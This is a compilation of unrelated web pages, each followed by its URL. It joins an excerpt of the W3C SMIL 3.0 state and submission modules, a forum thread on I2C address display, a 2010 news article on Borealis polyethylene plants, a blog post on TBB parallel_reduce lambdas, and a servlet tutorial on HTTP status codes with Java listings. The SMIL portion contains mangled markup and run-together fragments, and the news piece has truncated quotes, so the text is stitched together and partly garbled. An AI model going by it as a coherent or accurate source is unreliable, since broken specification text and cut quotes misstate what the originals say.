The setvalue element modifies the value of an item in the data model, similar to the corresponding element from XForms, but it takes its time behaviour from the SMIL ref element. Note that setvalue only modifies existing items; it is therefore an error to specify a non-existing item, depending on the expression-language semantics. In case of such an error the SMIL Timing semantics of the element are not affected. The setvalue element supports all timing attributes, and participates normally in timing computations. The effect of setvalue happens when it becomes active. The setvalue element accepts the ref and value attributes. Both of these are required attributes.

The newvalue element introduces a new, named item into the data model.
The newvalue element supports all timing attributes, and participates normally in timing computations. The effect of newvalue happens at the beginning of its simple duration. Depending on the semantics of the expression language, it may be an error to execute the newvalue element more than once. In case of such an error the SMIL Timing semantics of the element are not affected. The newvalue element accepts the ref, where, name and value attributes.

The delvalue element removes an item from the data model; it accepts the ref attribute.

The language attribute selects the expression language to use. Its value should be a URI defining that language. The default value for this attribute is defined in the profile. SMIL implementations should allow expression-language availability to be tested through the systemComponent attribute.

The ref attribute indicates which item in the data model will be changed. The language used to specify this, plus any additional constraints on the attribute value, depend on the expression language used.

This section is informative. The reason that newvalue has both a ref and a name attribute is that some languages, notably XPath 1.0, do not support ref referring to a non-existing named item in the data model. Therefore name is used to give the name for the new item, and ref and where specify where it is inserted. For expression languages without a hierarchical namespace, ref and where should be omitted and only name is needed.

This section is informative. For the SMIL 3.0 Language Profile, the value of the ref attribute is an XPath expression that must evaluate to a node-set.

The name attribute specifies the name for the new data model item. This name must adhere to constraints set by the expression language used.

The value attribute specifies the new value of the data model item referred to by the ref attribute. How the new value is specified in the value attribute is defined in the profile that includes this module. This specification also states whether only simple values are allowed or also expressions, and when those expressions are evaluated.
If a statically-typed language is used as the data-model language, it is an error if the type of the value expression cannot be coerced to the type of the item referred to by ref.

This section is informative. Here is a SMIL 3.0 Language Profile example of a sequence of audio clips that remembers the last audio clip played, omitting the state declaration in the head for brevity:

    <seq>
      <audio src="chapter1.mp3" />
      <setvalue ref="lastPlayed" value="1" />
      <audio src="chapter2.mp3" />
      <setvalue ref="lastPlayed" value="2" />
      <audio src="chapter3.mp3" />
      <setvalue ref="lastPlayed" value="3" />
    </seq>

Here is an extension of the previous example: not only is the last clip remembered, but if this sequence is played again later during the presentation, any audio clips played previously are skipped:

    <seq>
      ...
    </seq>
Here is the minimal state section that corresponds to the audio clip example above: <smil> <head> <state> <data xmlns=""> <lastPlayed>0</lastPlayed> </data> </state> ... formally specified in the profile. For ease of reading we include the relevant event defined in the SMIL 3.0 Language Profile here as well. The purpose of these events is to allow document authors to create documents (or sections of documents) that restart and re-evaluate conditional expressions whenever the values underlying the expressions have changed. UserState Module defined in this document is a new module which was not part of the SMIL 2.1 specification. This section is informative. This section introduces a method to save author defined state or to transmit it to an external server. This section is normative. The StateSubmission module defines two elements, submission and send, and the attributes submission, action, method, replace and target. The submission element carries the information needed to determine which parts of the data model should be sent, where it should be sent and what to do with any data returned. The ref attribute selects the portion of the data model to transmit and in case of XPath should be a node-set expression. The default is to transmit the whole data model (in case of xpath: "/"). The other attributes are explained below. The submission element accepts the ref, action, method, replace and target attributes. This section is informative This element was lifted straight from XForms, with the accompanying attributes. Support for asynchronous submission and the corresponding events are not needed because of SMIL's inherent parallelism. The send element causes the data model, or some part of the data model, to be submitted to server, saved to disk or transmitted externally through some other method. It does not specify any of this directly but contains only a reference to such submission instructions. 
The send supports all timing attributes, and participates normally in timing computations. The effect of send happens at the beginning of its simple duration. The send element accepts the submission attribute. The submission attribute is an IDREF that should refer to a submission element. A URL specifying where to transmit or save the nodeset. Which URLs are allowable must take security and privacy considerations into account. We need to follow the XForms lead here. Add some references. How to serialize and transmit the data. Allowed values are at least post and get but may be extended by the profile.(/)" restart="always" replace="none"/> ... <seq end="... some interactive end condition ..." > > In another presentation we could pick this value up again synchronously and use it. <smil> <head> <state> </state> <send xml: </head> <body> <par> ... <seq > <submit can use values from the data model to construct attribute values at runtime. The mechanism has been borrowed from XSLT attribute value templates. Substitution is triggered by using the construct {expression} anywhere inside an attribute value. The expression is evaluated, converted to a string value and substituted into the attribute value. This substitution happens when the element containing the attribute with the {expression} attribute becomes active. If any error occurs during the evaluation of the expression no substitution takes place, and the {expression} construct appears verbatim in the attribute value. If a profile includes this module it must list all attributes for which this substitution is allowed. It must use the same expression language for interpolation as the one used for StateTest expressions. This section is normative. This module does not define any new elements or attributes. This section is informative The SMIL 3.0 Language Profile includes the StateInterpolation module. 
It allows its use in the same set of attributes for which SMIL animation is allowed, plus the src, href, clipBegin and clipEnd attributes. It disallows its use on the Timing and Synchronization attributes. Its use on other attributes is implementation-dependent.

This section is informative. This SMIL 3.0 Language Profile example shows an icon corresponding to the CPU on which the user views the presentation, or a default icon for an unknown CPU:

    <switch>
      <img src="cpu-icons/{smil-CPU()}.png" />
      <img src="cpu-icons/unknown.png" />
    </switch>

This section is normative. Because StateInterpolation can also change attribute values, its interaction with animation and DOM access needs to be defined: the so-called "sandwich model". StateInterpolation sits between DOM access and animation, i.e. DOM access will see the {expression} strings verbatim and may set these values too, while SMIL animation will operate on the value of the expression.
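The substitution rule (evaluate each {expression}, but leave the construct verbatim on any error) can be illustrated outside SMIL. This toy Python sketch is not part of the specification; the dictionary-based evaluator merely stands in for the profile's expression engine, which in the SMIL 3.0 Language Profile would be XPath 1.0.

```python
import re

def interpolate(attr_value, evaluate):
    """Replace each {expression} with str(evaluate(expression)).
    On any evaluation error the construct is left verbatim, as the module requires."""
    def sub(match):
        expr = match.group(1)
        try:
            return str(evaluate(expr))
        except Exception:
            return match.group(0)  # leave {expression} untouched
    return re.sub(r"\{([^}]*)\}", sub, attr_value)

# Stand-in evaluator over a flat table of "expressions"
model = {"smil-CPU()": "x86"}
print(interpolate("cpu-icons/{smil-CPU()}.png", model.__getitem__))  # cpu-icons/x86.png
print(interpolate("cpu-icons/{unknown()}.png", model.__getitem__))   # left verbatim
```

Note how the error path reproduces the switch example's fallback behaviour: an unresolvable expression yields a src that matches no real file, so the next switch alternative is used.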
http://www.w3.org/TR/2008/CR-SMIL3-20080115/smil-state
Issue with I2C... or is it me?

CoachAllen: Greetings, I have been working with the LoPy4 and the MCP23017 I/O expander. I also have a Saleae Logic 4 that I have hooked up to see the protocol in action. I notice something strange, though. I initialize using the following:

    from machine import I2C
    i2c = I2C(0, I2C.MASTER)
    i2c.writeto_mem(0x20, 0x00, 0xFF)

The address set on the MCP23017 should be 0x20, as I have the A0...A2 pins all biased to ground. But the Saleae Logic UI is showing me that, instead of writing to the slave at 0x20, it is instead 0x40. What do you think is causing this?

CoachAllen: Okay, I figured out it's me. In the settings for the Saleae Logic software I had it set to 8-bit addressing, not 7-bit. Duh...
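For anyone hitting the same confusion: a 7-bit I2C address occupies the upper seven bits of the address byte on the wire, with the R/W flag in bit 0, so an analyzer configured for 8-bit addressing shows the 7-bit address shifted left by one. A quick sketch (the address values follow the thread; the helper names are my own):

```python
def to_8bit_write(addr7):
    """8-bit 'write' address byte as seen on the wire: 7-bit address << 1, R/W bit = 0."""
    return (addr7 << 1) | 0x0

def to_8bit_read(addr7):
    """8-bit 'read' address byte: 7-bit address << 1, R/W bit = 1."""
    return (addr7 << 1) | 0x1

# MCP23017 with A2..A0 grounded -> 7-bit address 0x20
print(hex(to_8bit_write(0x20)))  # 0x40, which is what the analyzer displayed
print(hex(to_8bit_read(0x20)))   # 0x41
```

MicroPython's machine.I2C API takes the 7-bit address, so 0x20 in the code was correct all along; only the analyzer's display convention differed.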
https://forum.pycom.io/topic/4933/issue-with-i2c-or-is-it-me
06 May 2010 16:44 [Source: ICIS news]

By Franco Capaldo

LONDON (ICIS news)--Borealis will look to take advantage of import growth in China, chief executive Mark Garrett said.

Garrett said that Borealis had been producing at full capacity for the past four years at the 600,000 tonne/year polyethylene (PE) plant at Ruwais, Abu Dhabi, that was built in the first stage of its Borouge joint venture with Abu Dhabi National Oil Company (ADNOC). This meant that it had been unable to take advantage of China's growth in that period.

However, with Borouge 2 due to start up this month at Ruwais - comprising a 1.5m tonne/year cracker, a 540,000 tonne/year PE plant and an 800,000 tonne/year polypropylene (PP) plant - Borealis was hoping to finally take advantage of demand growth in Asia.

Despite forecast growth in sales volumes, Garrett said Borealis was ready for possible difficulties in the second half of the year.

"This year the two new projects [Borouge and Stenungsund] ..." he said. "Then of course we expect a significant change in Borealis' company results next year," he added.

However, Garrett was wary of a dependence on China. "The world has become more dependent over the last two years as the western economies suffered and in some cases have fallen apart. Chinese growth is something that the rest of us have been living off and, if that would stop, I think you would see a very painful experience for the world," he said.

The CEO added that Borealis's new 350,000 tonne/year low density polyethylene (LDPE) plant at Stenungsund, Sweden, was about to come on stream. "We have put the hydrocarbons in and we are pressurising it up. We are hoping to have pellets in hand very soon; in the next week or two," Garrett said.

Additionally, Garrett said that Borealis would remain cautious over the next six months and would be keeping an eye on ...

"We see issues certainly going forward in ..."

However, Garrett said Borealis was in a fortunate position because, geographically, the group's plants focused on Scandinavia and ...

Daniel Shook, Borealis' chief financial officer (CFO), said the group had planned for certain scenarios. "We set out to make sure a very good liquidity position and over the last 18 months we have continued to term out the debt," he said.

As part of its strategy to further diversify its financing sources, Borealis sought to raise up to €200m ($256.4m) in an inaugural bond issue for launch in ...

"That gives us a lot of dry powder to weather what comes," Shook added.

Earlier on Thursday, Borealis reported a return to a first-quarter net profit of €54m, compared with a net loss of €56m recorded in the same period last year, as feedstock and polyolefin market prices continued to increase.
http://www.icis.com/Articles/2010/05/06/9356633/borealis-to-take-advantage-of-china-import-growth-ceo.html
When Threading Building Blocks Attack!

This week (25-29 JUL 2011) I'm lecturing at the UPCRC UIUC Summer School on Multicore Programming. I like teaching parallel programming and I live near the UIUC campus, so it's convenient for me. Overall I have a good time and often learn some things from the students. As an example, I found the following oddity about using lambdas within Intel® Threading Building Blocks (TBB).

One of the problems that I provided for the TBB hands-on lab was Prim's Algorithm to compute a Minimum Spanning Tree (MST) on a given undirected, weighted graph. I know this makes a good coding exercise since a TBB solution is given as Example 10-10 in The Art of Concurrency. Written in 2008, that code uses the imperative method of creating a new class for the parallel_reduce algorithm. Today, we have the possibility of using lambdas instead. But I'm getting ahead of myself. A quick review of what is involved in Prim's Algorithm is in order.

After choosing some arbitrary node to be in the partial MST, new graph nodes are added, one at a time per iteration of a loop. The first part of the processing within the loop body that adds a node is determining the node that is not currently part of the partial MST and is closest (connected by an edge of least weight) to some node that is in the MST. The smallest edge weights to nodes not yet part of the MST are held in a separate vector and are updated after a new node is added. Thus, to find the closest edge, a search for the index of the minimum value in the vector is done. This search can be done in parallel and involves a reduction operation. In fact, computing the index of the minimum element in a vector is the prototypical example for illustrating how to use the TBB parallel_reduce() algorithm. Two of the students working on the problem expected that this example should be easily translatable from the serial Prim's Algorithm code using the lambda notation. So did I.
What we didn't expect was the rigmarole that was required to actually carry out such a simple-sounding translation. To make this blog more worthwhile than me just ranting about the vagaries of TBB, please allow me to take an instructional bent for the remainder. Here is the original serial code of interest that finds the minimum value in the minDist vector, but returns the location (index) of that element in nodeIdx. (Note: a negative value in minDist is used to signal that the node has been previously added to the MST.)

min = FLT_MAX;
for (j = 1; j < N; j++) {
  if (0 <= minDist[j] && minDist[j] < min) {
    min = minDist[j];
    nodeIdx = j;
  }
}

And here is the TBB class I've used to perform this minimum-index reduction computation through a call to parallel_reduce():

class NearestNeighbor {
  const float *const NNDist;
public:
  float minDistVal;
  int minDistIndex;

  void operator()(const blocked_range<int>& r) {
    for (int j = r.begin(); j != r.end(); ++j) {
      if (0 <= NNDist[j] && NNDist[j] < minDistVal) {
        minDistVal = NNDist[j];
        minDistIndex = j;
      }
    }
  }

  void join(const NearestNeighbor& y) {
    if (y.minDistVal < minDistVal) {
      minDistVal = y.minDistVal;
      minDistIndex = y.minDistIndex;
    }
  }

  NearestNeighbor(const float *nnd)
    : NNDist(nnd), minDistVal(FLT_MAX), minDistIndex(-1) {}
  NearestNeighbor(NearestNeighbor& x, split)
    : NNDist(x.NNDist), minDistVal(FLT_MAX), minDistIndex(-1) {}
};

From the code above, we can extract the desired index from the minDistIndex member of the NearestNeighbor object. The lambda version of parallel_reduce() instead returns a value. During my lecture on Threading Building Blocks, I showed an example of parallel_reduce() that utilizes a more traditional summing reduction to compute an approximation of pi through numerical integration. Using that code as a template, the students transformed those computations and fields and parameters into code that should return the index of the minimum value. And so, we thought that this should work...
nodeIdx = parallel_reduce(
  blocked_range<int>(1, N),
  int(-1),
  [&](const blocked_range<int>& r, int local_idx) -> int {
    float minDistVal = FLT_MAX;
    local_idx = -1;
    for (int j = r.begin(); j != r.end(); ++j) {
      if (0 <= NNDist[j] && NNDist[j] < minDistVal) {
        minDistVal = NNDist[j];
        local_idx = j;
      }
    }
    return local_idx;
  },
  [&](int idx1, int idx2) -> int {
    if (NNDist[idx1] <= NNDist[idx2])
      return idx1;
    else
      return idx2;
  }
);

Using Intel® C++ Composer XE 2011 within Microsoft Visual Studio 2010, there was an error on the join lambda. The message kept saying that we were only allowed to have a single return in the lambda. Interesting, but easily fixed by adding a local variable to hold the index to be returned (assigned in the if-then-else statement) followed by a single return statement. Unfortunately, that didn't get rid of the error. After cogitating on the error message, we decided that maybe it was telling us that not only were we restricted to a single return statement in the body of the lambda, but that the only thing allowed in the lambda was that single return statement. (Surely that couldn't be right. I mean, look at the body lambda. That's got more than one line of code. And the imperative join method uses more than one line of code.) Thus, we tried this version of the join method...

[&](int idx1, int idx2) -> int {
  return (NNDist[idx1] <= NNDist[idx2]) ? idx1 : idx2;
}

And that worked. Is this "feature" of TBB documented? (I haven't yet found it, if it is.) Was it some odd restriction that is only in force within the C++ Composer XE 2011 version of the library? Or is it just my own ignorance of C++ and the lambda features being added to the C++0X standard? It does make an odd kind of sense, I suppose. If you've only got two things that can be considered for your reduction operation, it should be an easy matter of picking one or the other or combining the two values into a single value that can be returned. Who would need more than one line to do that?
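The shape that parallel_reduce() expects — a chunk-local scan that produces a partial result, plus a pairwise join that combines two partial results — is independent of C++. As a sketch of just that pattern (written in Python purely for illustration; this is not TBB), here the partial result carries a (value, index) pair, so the join can stay a single expression and never has to index back into the data:

```python
from functools import reduce

FLT_MAX = float("inf")

def local_scan(dist, lo, hi):
    """Chunk body: find the (value, index) of the smallest eligible entry in dist[lo:hi]."""
    best = (FLT_MAX, -1)
    for j in range(lo, hi):
        if 0 <= dist[j] < best[0]:
            best = (dist[j], j)
    return best

def join(a, b):
    """Pairwise combine: a single expression, like the one-line TBB join lambda."""
    return a if a[0] <= b[0] else b

def min_index(dist, chunk=4):
    # Scan index 1..N-1 in chunks, then fold the partial results together.
    partials = [local_scan(dist, lo, min(lo + chunk, len(dist)))
                for lo in range(1, len(dist), chunk)]
    return reduce(join, partials, (FLT_MAX, -1))[1]
```

Carrying the minimum value alongside the index also sidesteps the out-of-range lookup that NNDist[-1] would cause in the index-only version above whenever a chunk finds no eligible element.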
Even so, it was just a weird thing to run up against. (Disclaimer: I've recreated some of the code segments above from memory and witness statements provided after the fact. The code is provided for illustration purposes only and may not compile or execute correctly without modification.) Update (04 AUG 11): Modified the return value as pointed out in the first comment. My memory isn't what it used to be.
https://software.intel.com/zh-cn/blogs/2011/07/28/when-threading-building-blocks-attack?language=en
A Fast Introduction to Basic Servlet Programming - Oct 25, 2002

The status line consists of the HTTP version (HTTP/1.1 in the example above), a status code (an integer; 200 in the example), and a very short message corresponding to the status code (OK in the example). In most cases, all of the headers are optional except for Content-Type, which specifies the MIME type of the document that follows. Although most responses contain a document, some don't. For example, responses to HEAD requests should never include a document, and a variety of status codes essentially indicate failure and either don't include a document or include only a short error-message document. Servlets can perform a variety of important tasks by manipulating the status line and the response headers. For example, they can forward the user to other sites; indicate that the attached document is an image, Adobe Acrobat file, or HTML file; tell the user that a password is required to access the document; and so forth. This section briefly summarizes the most important status codes and what can be accomplished with them; see Chapter 6 of Core Servlets and JavaServer Pages (in PDF at) for more details. The following section discusses the response headers.

Specifying Status Codes

As just described, the HTTP response status line consists of an HTTP version, a status code, and an associated message. Since the message is directly associated with the status code and the HTTP version is determined by the server, all a servlet needs to do is to set the status code. A code of 200 is set automatically, so servlets don't usually need to specify a status code at all. When they do set a code, they do so with the setStatus method of HttpServletResponse. If your response includes a special status code and a document, be sure to call setStatus before actually returning any of the content with the PrintWriter.
That's because an HTTP response consists of the status line, one or more headers, a blank line, and the actual document, in that order. As discussed in Section 2.2 (Basic Servlet Structure), servlets do not necessarily buffer the document (version 2.1 servlets never do so), so you have to either set the status code before first using the PrintWriter or carefully check that the buffer hasn't been flushed and content actually sent to the browser.

Core Approach Set status codes before sending any document content to the client.

The setStatus method takes an int (the status code) as an argument, but instead of using explicit numbers, for clarity and reliability use the constants defined in HttpServletResponse. The name of each constant is derived from the standard HTTP 1.1 message for each code: all upper case, with a prefix of SC (for Status Code) and spaces changed to underscores. Thus, since the message for 404 is Not Found, the equivalent constant in HttpServletResponse is SC_NOT_FOUND. There are two exceptions, however. The constant for code 302 is derived from the HTTP 1.0 message (Moved Temporarily), not the HTTP 1.1 message (Found), and the constant for code 307 (Temporary Redirect) is missing altogether. Although the general method of setting status codes is simply to call response.setStatus(int), there are two common cases where a shortcut method in HttpServletResponse is provided. Just be aware that both of these methods throw IOException, whereas setStatus does not.

public void sendError(int code, String message)

The sendError method sends a status code (usually 404) along with a short message that is automatically formatted inside an HTML document and sent to the client.

public void sendRedirect(String url)

The sendRedirect method generates a 302 response along with a Location header giving the URL of the new document. With servlets version 2.1, this must be an absolute URL.
In version 2.2 and 2.3, either an absolute or a relative URL is permitted; the system automatically translates relative URLs into absolute ones before putting them in the Location header. Setting a status code does not necessarily mean that you don't need to return a document. For example, although most servers automatically generate a small File Not Found message for 404 responses, a servlet might want to customize this response. Again, remember that if you do send output, you have to call setStatus or sendError first.

HTTP 1.1 Status Codes

In this subsection I describe the most important status codes available for use in servlets talking to HTTP 1.1 clients, along with the standard message associated with each code. A good understanding of these codes can dramatically increase the capabilities of your servlets, so you should at least skim the descriptions to see what options are at your disposal. You can come back for details when you are ready to make use of some of the capabilities. The complete HTTP 1.1 specification is given in RFC 2616. In general, you can access RFCs online by going to and following the links to the latest RFC archive sites, but since this one came from the World Wide Web Consortium, you can just go to. Codes that are new in HTTP 1.1 are noted, since some browsers support only HTTP 1.0. You should only send the new codes to clients that support HTTP 1.1, as verified by checking request.getProtocol. The rest of this section describes the specific status codes available in HTTP 1.1. These codes fall into five general categories:

100-199 Codes in the 100s are informational, indicating that the client should respond with some other action.

200-299 Values in the 200s signify that the request was successful.

300-399 Values in the 300s are used for files that have moved and usually include a Location header indicating the new address.

400-499 Values in the 400s indicate an error by the client.
500-599 Codes in the 500s signify an error by the server.

The constants in HttpServletResponse that represent the various codes are derived from the standard messages associated with the codes. In servlets, you usually refer to status codes only by means of these constants. For example, you would use response.setStatus(response.SC_NO_CONTENT) rather than response.setStatus(204), since the latter is unclear to readers and is prone to typographical errors. However, you should note that servers are allowed to vary the messages slightly, and clients pay attention only to the numeric value. So, for example, you might see a server return a status line of HTTP/1.1 200 Document Follows instead of HTTP/1.1 200 OK.

100 (Continue) If the server receives an Expect request header with a value of 100-continue, it means that the client is asking if it can send an attached document in a follow-up request. In such a case, the server should either respond with status 100 (SC_CONTINUE) to tell the client to go ahead or use 417 (Expectation Failed) to tell the browser it won't accept the document. This status code is new in HTTP 1.1.

200 (OK) A value of 200 (SC_OK) means that everything is fine. The document follows for GET and POST requests. This status is the default for servlets; if you don't use setStatus, you'll get 200.

202 (Accepted) A value of 202 (SC_ACCEPTED) tells the client that the request is being acted upon, but processing is not yet complete.

204 (No Content) A status code of 204 (SC_NO_CONTENT) stipulates that the browser should continue to display the previous document because no new document is available.

205 (Reset Content) A status code of 205 (SC_RESET_CONTENT) instructs browsers to clear form fields. It is new in HTTP 1.1.

301 (Moved Permanently) The 301 (SC_MOVED_PERMANENTLY) status indicates that the requested document is elsewhere; the new URL for the document is given in the Location response header. Browsers should automatically follow the link to the new URL.
302 (Found) This value is similar to 301, except that in principle the URL given by the Location header should be interpreted as a temporary replacement, not a permanent one. In practice, most browsers treat 301 and 302 identically. Note: in HTTP 1.0, the message was Moved Temporarily instead of Found, and the constant in HttpServletResponse is SC_MOVED_TEMPORARILY, not the expected SC_FOUND.

Core Note The constant representing 302 is SC_MOVED_TEMPORARILY, not SC_FOUND.

Status code 302 is useful because browsers automatically follow the reference to the new URL given in the Location response header. It is so useful, in fact, that there is a special method for it, sendRedirect. Using response.sendRedirect(url) has a couple of advantages over using response.setStatus(response.SC_MOVED_TEMPORARILY) and response.setHeader("Location", url). First, it is shorter and easier. Second, with sendRedirect, the servlet automatically builds a page containing the link to show to older browsers that don't automatically follow redirects. Finally, with version 2.2 and 2.3 of servlets, sendRedirect can handle relative URLs, automatically translating them into absolute ones. Technically, browsers are only supposed to automatically follow the redirection if the original request was GET. For details, see the discussion of the 307 status code.

303 (See Other) The 303 (SC_SEE_OTHER) status is similar to 301 and 302, except that if the original request was POST, the new document (given in the Location header) should be retrieved with GET. This code is new in HTTP 1.1.

304 (Not Modified) When a client has a cached document, it can perform a conditional request by supplying an If-Modified-Since header to indicate that it wants the document only if it has been changed since the specified date. A value of 304 (SC_NOT_MODIFIED) tells the client that it can continue to use its cached version of the document. For an example, see Section 2.8 of Core Servlets and JavaServer Pages.
307 (Temporary Redirect) The rules for how a browser should handle a 307 status are identical to those for 302. The 307 value was added to HTTP 1.1 since many browsers erroneously follow the redirection on a 302 response even if the original message is a POST. Browsers are supposed to follow the redirection of a POST request only when they receive a 303 response status. This new status is intended to be unambiguously clear: follow redirected GET and POST requests in the case of 303 responses; follow redirected GET but not POST requests in the case of 307 responses. Note: for some reason there is no constant in HttpServletResponse corresponding to this status code, so you have to use 307 explicitly. This status code is new in HTTP 1.1.

400 (Bad Request) A 400 (SC_BAD_REQUEST) status indicates bad syntax in the client request.

401 (Unauthorized) A value of 401 (SC_UNAUTHORIZED) signifies that the client tried to access a password-protected page without proper identifying information in the Authorization header. The response must include a WWW-Authenticate header.

404 (Not Found) The 404 (SC_NOT_FOUND) status means that no resource could be found at the given address. A convenient feature of this status is that, with sendError, the server automatically generates an error page showing the error message. 404 errors need not merely say "Sorry, the page cannot be found." Instead, they can give information on why the page couldn't be found or supply search boxes or alternative places to look. The sites at and have particularly good examples of useful error pages. In fact, there is an entire site dedicated to the good, the bad, the ugly, and the bizarre in 404 error messages:. I find particularly amusing. Unfortunately, however, the default behavior of Internet Explorer 5 is to ignore the error page you send back and to display its own, even though doing so contradicts the HTTP specification. To turn off this setting, you can.

Core Warning By default, Internet Explorer version 5 improperly ignores server-generated error pages.
To make matters worse, some versions of Tomcat 3 fail to properly handle strings that are passed to sendError. So, if you are using Tomcat 3, you may need to generate 404 error messages by hand. Fortunately, it is relatively uncommon for individual servlets to build their own 404 error pages. A more common approach is to set up error pages for each Web application; see Section 5.8 (Designating Pages to Handle Errors) for details. Tomcat correctly handles these pages.

Core Warning Some versions of Tomcat 3.x fail to properly display strings that are supplied to sendError.

405 (Method Not Allowed) A 405 (SC_METHOD_NOT_ALLOWED) value indicates that the request method (GET, POST, HEAD, PUT, DELETE, etc.) was not allowed for this particular resource. This status code is new in HTTP 1.1.

415 (Unsupported Media Type) A value of 415 (SC_UNSUPPORTED_MEDIA_TYPE) means that the request had an attached document of a type the server doesn't know how to handle. This status code is new in HTTP 1.1.

417 (Expectation Failed) If the server receives an Expect request header with a value of 100-continue, it means that the client is asking if it can send an attached document in a follow-up request; the server uses the 417 (SC_EXPECTATION_FAILED) status to tell the browser that it won't accept the document. This status code is new in HTTP 1.1.

500 (Internal Server Error) 500 (SC_INTERNAL_SERVER_ERROR) is the generic "server is confused" status code. It often results from CGI programs or (heaven forbid!) servlets that crash or return improperly formatted headers.

501 (Not Implemented) The 501 (SC_NOT_IMPLEMENTED) status notifies the client that the server doesn't support the functionality to fulfill the request. It is used, for example, when the client issues a command like PUT that the server doesn't support.

503 (Service Unavailable) A status code of 503 (SC_SERVICE_UNAVAILABLE) signifies that the server cannot respond because of maintenance or overloading. For example, a servlet might return this header if some thread or database connection pool is currently full. The server can supply a Retry-After header to tell the client when to try again.
505 (HTTP Version Not Supported) The 505 (SC_HTTP_VERSION_NOT_SUPPORTED) code means that the server doesn't support the version of HTTP named in the request line. This status code is new in HTTP 1.1.

A Front End to Various Search Engines

Listing 2.12 presents an example that makes use of the two most common status codes other than 200 (OK): 302 (Found) and 404 (Not Found). The 302 code is set by the shorthand sendRedirect method of HttpServletResponse, and 404 is specified by sendError. In this application, an HTML form (see Figure 2-10 and the source code in Listing 2.14) first displays a page that lets the user specify a search string, the number of results to show per page, and the search engine to use. When the form is submitted, the servlet extracts those three parameters, constructs a URL with the parameters embedded in a way appropriate to the search engine selected (see the SearchSpec class of Listing 2.13), and redirects the user to that URL (see Figure 2-11). If the user fails to choose a search engine or specify search terms, an error page informs the client of this fact (but see the warnings under the 404 status code in the previous subsection).

Listing 2.12 SearchEngines.java

package moreservlets;

import java.io.*;
import javax.servlet.*;
import javax.servlet.http.*;
import java.net.*;

/** Servlet that takes a search string, number of results per
 *  page, and a search engine name, sending the query to
 *  that search engine. Illustrates manipulating
 *  the response status line. It sends a 302 response
 *  (via sendRedirect) if it gets a known search engine,
 *  and sends a 404 response (via sendError) otherwise.
 */

public class SearchEngines extends HttpServlet {
  public void doGet(HttpServletRequest request,
                    HttpServletResponse response)
      throws ServletException, IOException {
    String searchString = request.getParameter("searchString");
    if ((searchString == null) ||
        (searchString.length() == 0)) {
      reportProblem(response, "Missing search string.");
      return;
    }
    // The URLEncoder changes spaces to "+" signs and other
    // non-alphanumeric characters to "%XY", where XY is the
    // hex value of the ASCII (or ISO Latin-1) character.
    // Browsers always URL-encode form values, so the
    // getParameter method decodes automatically. But since
    // we're just passing this on to another server, we need to
    // re-encode it.
    searchString = URLEncoder.encode(searchString);
    String numResults = request.getParameter("numResults");
    if ((numResults == null) ||
        (numResults.equals("0")) ||
        (numResults.length() == 0)) {
      numResults = "10";
    }
    String searchEngine = request.getParameter("searchEngine");
    if (searchEngine == null) {
      reportProblem(response, "Missing search engine name.");
      return;
    }
    SearchSpec[] commonSpecs = SearchSpec.getCommonSpecs();
    for (int i = 0; i < commonSpecs.length; i++) {
      SearchSpec searchSpec = commonSpecs[i];
      if (searchSpec.getName().equals(searchEngine)) {
        String url = searchSpec.makeURL(searchString, numResults);
        response.sendRedirect(url);
        return;
      }
    }
    reportProblem(response, "Unrecognized search engine.");
  }

  private void reportProblem(HttpServletResponse response,
                             String message)
      throws IOException {
    response.sendError(response.SC_NOT_FOUND,
                       "<H2>" + message + "</H2>");
  }

  public void doPost(HttpServletRequest request,
                     HttpServletResponse response)
      throws ServletException, IOException {
    doGet(request, response);
  }
}

Listing 2.13 SearchSpec.java

package moreservlets;

/** Small class that encapsulates how to construct a
 *  search string for a particular search engine.
 */
public class SearchSpec {
  private String name, baseURL, numResultsSuffix;

  private static SearchSpec[] commonSpecs =
    { new SearchSpec("google", "", "&num="),
      new SearchSpec("altavista", "", "&nbq="),
      new SearchSpec("lycos", "" + "pursuit?query=", "") };

  public SearchSpec(String name,
                    String baseURL,
                    String numResultsSuffix) {
    this.name = name;
    this.baseURL = baseURL;
    this.numResultsSuffix = numResultsSuffix;
  }

  public String makeURL(String searchString, String numResults) {
    return (baseURL + searchString + numResultsSuffix + numResults);
  }

  public String getName() {
    return (name);
  }

  public static SearchSpec[] getCommonSpecs() {
    return (commonSpecs);
  }
}

Figure 2-10 Front end to the SearchEngines servlet. See Listing 2.14 for the HTML source code.
Figure 2-11 Result of the SearchEngines servlet when the form of Figure 2-10 is submitted.

Figure 2-12 Result of the SearchEngines servlet when a form that has no search string is submitted. This result is for JRun 3.1; results can vary slightly among servers and will omit the "Missing search string" message in most Tomcat versions.

Listing 2.14 SearchEngines.html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
  <TITLE>Searching the Web</TITLE>
</HEAD>
<BODY BGCOLOR="#FDF5E6">
<H1 ALIGN="CENTER">Searching the Web</H1>
<FORM ACTION="/servlet/moreservlets.SearchEngines">
<CENTER>
Search String:
<INPUT TYPE="TEXT" NAME="searchString"><BR>
Results to Show Per Page:
<INPUT TYPE="TEXT" NAME="numResults" VALUE=10 SIZE=3><BR>
<INPUT TYPE="RADIO" NAME="searchEngine" VALUE="google">
Google |
<INPUT TYPE="RADIO" NAME="searchEngine" VALUE="altavista">
AltaVista |
<INPUT TYPE="RADIO" NAME="searchEngine" VALUE="lycos">
Lycos |
<INPUT TYPE="RADIO" NAME="searchEngine" VALUE="hotbot">
HotBot
<BR>
<INPUT TYPE="SUBMIT" VALUE="Search">
</CENTER>
</FORM>
</BODY>
</HTML>
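Stepping back from the listings: three of the mechanical rules described in this article — the SC_ constant naming convention, the status-class ranges, and the GET/POST redirect-following rules for 302, 303, and 307 — are easy to capture in code. A quick sketch (in Python, purely for illustration; these are not servlet APIs):

```python
def constant_name(message):
    # HttpServletResponse convention: upper case, spaces -> underscores, "SC_" prefix.
    # Remember the documented exceptions: 302 uses SC_MOVED_TEMPORARILY
    # (not the derived SC_FOUND), and 307 has no constant at all.
    return "SC_" + message.upper().replace(" ", "_")

def status_class(code):
    # 1xx informational, 2xx success, 3xx redirection,
    # 4xx client error, 5xx server error.
    return {1: "informational", 2: "success", 3: "redirection",
            4: "client error", 5: "server error"}[code // 100]

def should_auto_follow(status, method):
    # Per HTTP 1.1: 303 is followed for GET and POST;
    # 301/302/307 should be auto-followed only when the request was GET.
    if status == 303:
        return True
    if status in (301, 302, 307):
        return method == "GET"
    return False
```

As the article notes, real browsers have historically not honored the 302-versus-307 distinction, which is exactly why 307 was introduced.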
http://www.informit.com/articles/article.aspx?p=29817&seqNum=7
Building pager view component

